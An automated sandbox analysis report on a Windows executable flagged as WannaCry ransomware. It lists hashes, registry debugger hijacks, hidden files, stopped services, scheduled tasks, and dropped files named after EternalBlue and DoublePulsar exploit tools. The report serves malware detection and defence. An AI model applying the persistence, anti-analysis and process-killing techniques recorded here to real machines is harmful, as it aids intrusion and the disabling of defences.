Analysis
-
max time kernel
153s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
14-07-2022 03:52
Static task
static1
Behavioral task
behavioral1
Sample
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe
Resource
win10v2004-20220414-en
General
-
Target
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe
-
Size
5.4MB
-
MD5
a755f76611af191caac97da04633b012
-
SHA1
ee2fba5a45e09e560c67f5107f76cf6e9a36ab53
-
SHA256
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6
-
SHA512
b53fee6fb2b1013989e963b67f11924b8498e198b779fcfb49dc2154ca1a61c89f5abb32b91ed1052052a9c40f7ee1c2c58abf6ee1877b712d7b5899f2d97840
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
CPUInfo.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ CPUInfo.exe -
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
CPUInfo.exepid process 4592 CPUInfo.exe -
Sets file execution options in registry 2 TTPs 21 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauc1t.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauc1t.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostr.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe\debugger = "taskkill.exe" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nanol.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostr.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systmss.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systmss.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ystmss.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ystmss.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nanol.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe\debugger = "taskkill.exe" reg.exe -
Sets file to hidden 1 TTPs 13 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 4016 attrib.exe 3784 attrib.exe 1056 attrib.exe 4840 attrib.exe 2800 attrib.exe 3464 attrib.exe 4456 attrib.exe 2756 attrib.exe 1052 attrib.exe 3992 attrib.exe 4356 attrib.exe 4920 attrib.exe 5032 attrib.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/2964-132-0x0000000000400000-0x0000000000A2E000-memory.dmp upx behavioral2/memory/2964-153-0x0000000000400000-0x0000000000A2E000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
takeown.exetakeown.exetakeown.exepid process 1860 takeown.exe 240 takeown.exe 1448 takeown.exe -
Drops file in System32 directory 18 IoCs
Processes:
CPUInfo.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content CPUInfo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\ips138[1].htm CPUInfo.exe File opened for modification C:\Windows\SysWOW64\ftp.exe attrib.exe File opened for modification C:\Windows\SysWOW64\ftp.exe attrib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 CPUInfo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData CPUInfo.exe File opened for modification C:\Windows\SysWOW64\WUDHostServices.exe attrib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE CPUInfo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3FE2BD01AB6BC312BF0DADE7F797388F_F2379ADA3CBEBD919394FF2BE001D546 CPUInfo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\G8L4QUQX.txt CPUInfo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3FE2BD01AB6BC312BF0DADE7F797388F_F2379ADA3CBEBD919394FF2BE001D546 CPUInfo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D56B4E335E80143B4541C1723368A393_DB64D7F70B0B0BA362A66F89CB02358F CPUInfo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache CPUInfo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D56B4E335E80143B4541C1723368A393_DB64D7F70B0B0BA362A66F89CB02358F CPUInfo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 CPUInfo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies CPUInfo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\ips138[1].asp CPUInfo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft CPUInfo.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
CPUInfo.exepid process 4592 CPUInfo.exe -
Drops file in Program Files directory 2 IoCs
Processes:
attrib.exeattrib.exedescription ioc process File opened for modification C:\program files (x86)\stormii attrib.exe File opened for modification C:\Progra~1\dll attrib.exe -
Drops file in Windows directory 64 IoCs
Processes:
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exeCPUInfo.exeattrib.exeattrib.exedescription ioc process File created \??\c:\windows\demc.bat 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe File created \??\c:\windows\demo.bat 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe File created C:\windows\IIS\adfw.dll CPUInfo.exe File created C:\windows\IIS\exma-1.dll CPUInfo.exe File created C:\windows\IIS\adfw-2.dll CPUInfo.exe File created C:\windows\IIS\cnli-1.dll CPUInfo.exe File created C:\windows\IIS\exma.dll CPUInfo.exe File created C:\windows\IIS\Eternalchampion-2.0.0.xml CPUInfo.exe File created C:\windows\IIS\Esteemaudit-2.1.0.exe CPUInfo.exe File created C:\windows\IIS\ssleay32.dll CPUInfo.exe File created C:\windows\IIS\esco-0.dll CPUInfo.exe File created C:\windows\IIS\riar-2.dll CPUInfo.exe File created C:\windows\IIS\trfo-0.dll CPUInfo.exe File opened for modification C:\windows\IIS\x64.dll 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe File created C:\windows\IIS\trfo-2.dll CPUInfo.exe File created C:\windows\IIS\x86.dll 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe File opened for modification C:\Windows\srvany.exe attrib.exe File created C:\windows\IIS\x86.dll CPUInfo.exe File created C:\windows\IIS\Eternalblue-2.2.0.fb CPUInfo.exe File created C:\windows\IIS\posh.dll CPUInfo.exe File created C:\windows\IIS\trfo.dll CPUInfo.exe File created C:\windows\IIS\2.txt CPUInfo.exe File opened for modification C:\Windows\svchost.exe attrib.exe File created C:\windows\IIS\crli-0.dll CPUInfo.exe File created C:\windows\IIS\dmgd-4.dll CPUInfo.exe File created C:\windows\IIS\etebCore-2.x64.dll CPUInfo.exe File created C:\windows\IIS\etebCore-2.x86.dll CPUInfo.exe File created C:\windows\IIS\tibe-1.dll CPUInfo.exe File created C:\windows\IIS\x64.dll 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe File created C:\windows\IIS\Esteemaudittouch-2.1.0.fb CPUInfo.exe File created C:\windows\IIS\Eternalchampion-2.0.0.fb CPUInfo.exe File created C:\windows\IIS\pcre-0.dll CPUInfo.exe File created C:\windows\IIS\pcreposix-0.dll CPUInfo.exe File created C:\windows\IIS\tucl.dll CPUInfo.exe File created C:\windows\IIS\zibe.dll CPUInfo.exe File created C:\windows\IIS\free.bat 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe File created C:\windows\IIS\Doublepulsar-1.3.1.exe CPUInfo.exe File created C:\windows\IIS\dmgd-1.dll CPUInfo.exe File created C:\windows\IIS\etch-0.dll CPUInfo.exe File created C:\windows\IIS\libxml2.dll CPUInfo.exe File created C:\windows\IIS\posh-0.dll CPUInfo.exe File created C:\windows\IIS\riar.dll CPUInfo.exe File created C:\windows\IIS\CPUInfo.exe 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe File created C:\windows\IIS\Doublepulsar-1.3.1.xml CPUInfo.exe File created C:\windows\IIS\Eternalblue-2.2.0.xml CPUInfo.exe File created C:\windows\IIS\etchCore-0.x64.dll CPUInfo.exe File created C:\windows\IIS\libcurl.dll CPUInfo.exe File created C:\windows\IIS\libeay32.dll CPUInfo.exe File created C:\windows\IIS\zlib1.dll CPUInfo.exe File created C:\windows\IIS\Esteemaudittouch-2.1.0.exe CPUInfo.exe File created C:\windows\IIS\Eternalchampion-2.0.0.exe CPUInfo.exe File created C:\windows\IIS\etchCore-0.x86.dll CPUInfo.exe File created C:\windows\IIS\tibe.dll CPUInfo.exe File created C:\windows\IIS\tibe-2.dll CPUInfo.exe File created C:\windows\IIS\xdvl-0.dll CPUInfo.exe File created C:\windows\IIS\s.exe CPUInfo.exe File created C:\windows\IIS\coli-0.dll CPUInfo.exe File created C:\windows\IIS\eteb-2.dll CPUInfo.exe File created C:\windows\IIS\pcla-0.dll CPUInfo.exe File created C:\windows\IIS\pcrecpp-0.dll CPUInfo.exe File opened for modification C:\windows\IIS\x86.dll 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe File created C:\windows\IIS\Esteemaudittouch-2.1.0.xml CPUInfo.exe File created C:\windows\IIS\cnli-0.dll CPUInfo.exe File created C:\windows\IIS\trch.dll CPUInfo.exe -
Launches sc.exe 25 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4304 sc.exe 3984 sc.exe 1636 sc.exe 5068 sc.exe 3140 sc.exe 4020 sc.exe 3576 sc.exe 3124 sc.exe 384 sc.exe 4852 sc.exe 4932 sc.exe 1532 sc.exe 1412 sc.exe 444 sc.exe 1300 sc.exe 3928 sc.exe 4444 sc.exe 916 sc.exe 2760 sc.exe 1644 sc.exe 1992 sc.exe 3288 sc.exe 2668 sc.exe 4608 sc.exe 420 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4864 schtasks.exe 4748 schtasks.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 648 ipconfig.exe -
Kills process with WMI 12 IoCs
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 3316 WMIC.exe 4340 WMIC.exe 2980 WMIC.exe 240 WMIC.exe 1320 WMIC.exe 2756 WMIC.exe 2412 WMIC.exe 2088 WMIC.exe 752 WMIC.exe 1404 WMIC.exe 2044 WMIC.exe 3056 WMIC.exe -
Kills process with taskkill 42 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4876 taskkill.exe 1956 taskkill.exe 3320 taskkill.exe 5068 taskkill.exe 2764 taskkill.exe 3104 taskkill.exe 4272 taskkill.exe 4944 taskkill.exe 3532 taskkill.exe 4204 taskkill.exe 2312 taskkill.exe 2644 taskkill.exe 1456 taskkill.exe 3352 taskkill.exe 4476 taskkill.exe 3780 taskkill.exe 2676 taskkill.exe 3852 taskkill.exe 1944 taskkill.exe 1836 taskkill.exe 2864 taskkill.exe 3112 taskkill.exe 1548 taskkill.exe 4428 taskkill.exe 3360 taskkill.exe 3128 taskkill.exe 1936 taskkill.exe 1332 taskkill.exe 2744 taskkill.exe 2308 taskkill.exe 2660 taskkill.exe 876 taskkill.exe 2236 taskkill.exe 4500 taskkill.exe 4148 taskkill.exe 5080 taskkill.exe 824 taskkill.exe 432 taskkill.exe 4036 taskkill.exe 4532 taskkill.exe 2100 taskkill.exe 1260 taskkill.exe -
Modifies data under HKEY_USERS 9 IoCs
Processes:
CPUInfo.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" CPUInfo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" CPUInfo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ CPUInfo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" CPUInfo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix CPUInfo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing CPUInfo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" CPUInfo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" CPUInfo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" CPUInfo.exe -
Modifies registry class 1 IoCs
Processes:
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
CPUInfo.exepid process 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe 4592 CPUInfo.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 2756 WMIC.exe Token: SeSecurityPrivilege 2756 WMIC.exe Token: SeTakeOwnershipPrivilege 2756 WMIC.exe Token: SeLoadDriverPrivilege 2756 WMIC.exe Token: SeSystemProfilePrivilege 2756 WMIC.exe Token: SeSystemtimePrivilege 2756 WMIC.exe Token: SeProfSingleProcessPrivilege 2756 WMIC.exe Token: SeIncBasePriorityPrivilege 2756 WMIC.exe Token: SeCreatePagefilePrivilege 2756 WMIC.exe Token: SeBackupPrivilege 2756 WMIC.exe Token: SeRestorePrivilege 2756 WMIC.exe Token: SeShutdownPrivilege 2756 WMIC.exe Token: SeDebugPrivilege 2756 WMIC.exe Token: SeSystemEnvironmentPrivilege 2756 WMIC.exe Token: SeRemoteShutdownPrivilege 2756 WMIC.exe Token: SeUndockPrivilege 2756 WMIC.exe Token: SeManageVolumePrivilege 2756 WMIC.exe Token: 33 2756 WMIC.exe Token: 34 2756 WMIC.exe Token: 35 2756 WMIC.exe Token: 36 2756 WMIC.exe Token: SeIncreaseQuotaPrivilege 2756 WMIC.exe Token: SeSecurityPrivilege 2756 WMIC.exe Token: SeTakeOwnershipPrivilege 2756 WMIC.exe Token: SeLoadDriverPrivilege 2756 WMIC.exe Token: SeSystemProfilePrivilege 2756 WMIC.exe Token: SeSystemtimePrivilege 2756 WMIC.exe Token: SeProfSingleProcessPrivilege 2756 WMIC.exe Token: SeIncBasePriorityPrivilege 2756 WMIC.exe Token: SeCreatePagefilePrivilege 2756 WMIC.exe Token: SeBackupPrivilege 2756 WMIC.exe Token: SeRestorePrivilege 2756 WMIC.exe Token: SeShutdownPrivilege 2756 WMIC.exe Token: SeDebugPrivilege 2756 WMIC.exe Token: SeSystemEnvironmentPrivilege 2756 WMIC.exe Token: SeRemoteShutdownPrivilege 2756 WMIC.exe Token: SeUndockPrivilege 2756 WMIC.exe Token: SeManageVolumePrivilege 2756 WMIC.exe Token: 33 2756 WMIC.exe Token: 34 2756 WMIC.exe Token: 35 2756 WMIC.exe Token: 36 2756 WMIC.exe Token: SeIncreaseQuotaPrivilege 2412 WMIC.exe Token: SeSecurityPrivilege 2412 WMIC.exe Token: SeTakeOwnershipPrivilege 2412 WMIC.exe Token: SeLoadDriverPrivilege 2412 WMIC.exe Token: SeSystemProfilePrivilege 2412 WMIC.exe Token: SeSystemtimePrivilege 2412 WMIC.exe Token: SeProfSingleProcessPrivilege 2412 WMIC.exe Token: SeIncBasePriorityPrivilege 2412 WMIC.exe Token: SeCreatePagefilePrivilege 2412 WMIC.exe Token: SeBackupPrivilege 2412 WMIC.exe Token: SeRestorePrivilege 2412 WMIC.exe Token: SeShutdownPrivilege 2412 WMIC.exe Token: SeDebugPrivilege 2412 WMIC.exe Token: SeSystemEnvironmentPrivilege 2412 WMIC.exe Token: SeRemoteShutdownPrivilege 2412 WMIC.exe Token: SeUndockPrivilege 2412 WMIC.exe Token: SeManageVolumePrivilege 2412 WMIC.exe Token: 33 2412 WMIC.exe Token: 34 2412 WMIC.exe Token: 35 2412 WMIC.exe Token: 36 2412 WMIC.exe Token: SeIncreaseQuotaPrivilege 2412 WMIC.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exeCPUInfo.exepid process 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe 4592 CPUInfo.exe 4592 CPUInfo.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.execmd.execmd.exedescription pid process target process PID 2964 wrote to memory of 3428 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe cmd.exe PID 2964 wrote to memory of 3428 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe cmd.exe PID 2964 wrote to memory of 3428 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe cmd.exe PID 2964 wrote to memory of 3316 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe cmd.exe PID 2964 wrote to memory of 3316 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe cmd.exe PID 2964 wrote to memory of 3316 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe cmd.exe PID 3316 wrote to memory of 3928 3316 cmd.exe sc.exe PID 3316 wrote to memory of 3928 3316 cmd.exe sc.exe PID 3316 wrote to memory of 3928 3316 cmd.exe sc.exe PID 3428 wrote to memory of 2756 3428 cmd.exe WMIC.exe PID 3428 wrote to memory of 2756 3428 cmd.exe WMIC.exe PID 3428 wrote to memory of 2756 3428 cmd.exe WMIC.exe PID 3316 wrote to memory of 5068 3316 cmd.exe sc.exe PID 3316 wrote to memory of 5068 3316 cmd.exe sc.exe PID 3316 wrote to memory of 5068 3316 cmd.exe sc.exe PID 3316 wrote to memory of 4376 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 4376 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 4376 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 3120 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 3120 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 3120 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 4864 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 4864 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 4864 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 4748 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 4748 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 4748 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 3992 3316 cmd.exe attrib.exe PID 3316 wrote to memory of 3992 3316 cmd.exe attrib.exe PID 3316 wrote to memory of 3992 3316 cmd.exe attrib.exe PID 3316 wrote to memory of 4356 3316 cmd.exe attrib.exe PID 3316 wrote to memory of 4356 3316 cmd.exe attrib.exe PID 3316 wrote to memory of 4356 3316 cmd.exe attrib.exe PID 3428 wrote to memory of 4480 3428 cmd.exe cmd.exe PID 3428 wrote to memory of 4480 3428 cmd.exe cmd.exe PID 3428 wrote to memory of 4480 3428 cmd.exe cmd.exe PID 3428 wrote to memory of 3328 3428 cmd.exe cacls.exe PID 3428 wrote to memory of 3328 3428 cmd.exe cacls.exe PID 3428 wrote to memory of 3328 3428 cmd.exe cacls.exe PID 3316 wrote to memory of 2084 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 2084 3316 cmd.exe schtasks.exe PID 3316 wrote to memory of 2084 3316 cmd.exe schtasks.exe PID 3428 wrote to memory of 4920 3428 cmd.exe attrib.exe PID 3428 wrote to memory of 4920 3428 cmd.exe attrib.exe PID 3428 wrote to memory of 4920 3428 cmd.exe attrib.exe PID 3428 wrote to memory of 1060 3428 cmd.exe cmd.exe PID 3428 wrote to memory of 1060 3428 cmd.exe cmd.exe PID 3428 wrote to memory of 1060 3428 cmd.exe cmd.exe PID 3428 wrote to memory of 1132 3428 cmd.exe cacls.exe PID 3428 wrote to memory of 1132 3428 cmd.exe cacls.exe PID 3428 wrote to memory of 1132 3428 cmd.exe cacls.exe PID 3428 wrote to memory of 2412 3428 cmd.exe WMIC.exe PID 3428 wrote to memory of 2412 3428 cmd.exe WMIC.exe PID 3428 wrote to memory of 2412 3428 cmd.exe WMIC.exe PID 2964 wrote to memory of 1468 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe WScript.exe PID 2964 wrote to memory of 1468 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe WScript.exe PID 2964 wrote to memory of 1468 2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe WScript.exe PID 3428 wrote to memory of 3140 3428 cmd.exe sc.exe PID 3428 wrote to memory of 3140 3428 cmd.exe sc.exe PID 3428 wrote to memory of 3140 3428 cmd.exe sc.exe PID 3428 wrote to memory of 4204 3428 cmd.exe taskkill.exe PID 3428 wrote to memory of 4204 3428 cmd.exe taskkill.exe PID 3428 wrote to memory of 4204 3428 cmd.exe taskkill.exe PID 3428 wrote to memory of 240 3428 cmd.exe takeown.exe -
Views/modifies file attributes 1 TTPs 15 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 3992 attrib.exe 4920 attrib.exe 3784 attrib.exe 1056 attrib.exe 2800 attrib.exe 1408 attrib.exe 872 attrib.exe 2756 attrib.exe 1052 attrib.exe 4840 attrib.exe 4356 attrib.exe 4016 attrib.exe 3464 attrib.exe 4456 attrib.exe 5032 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe"C:\Users\Admin\AppData\Local\Temp\483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe"1⤵
- Checks computer location settings
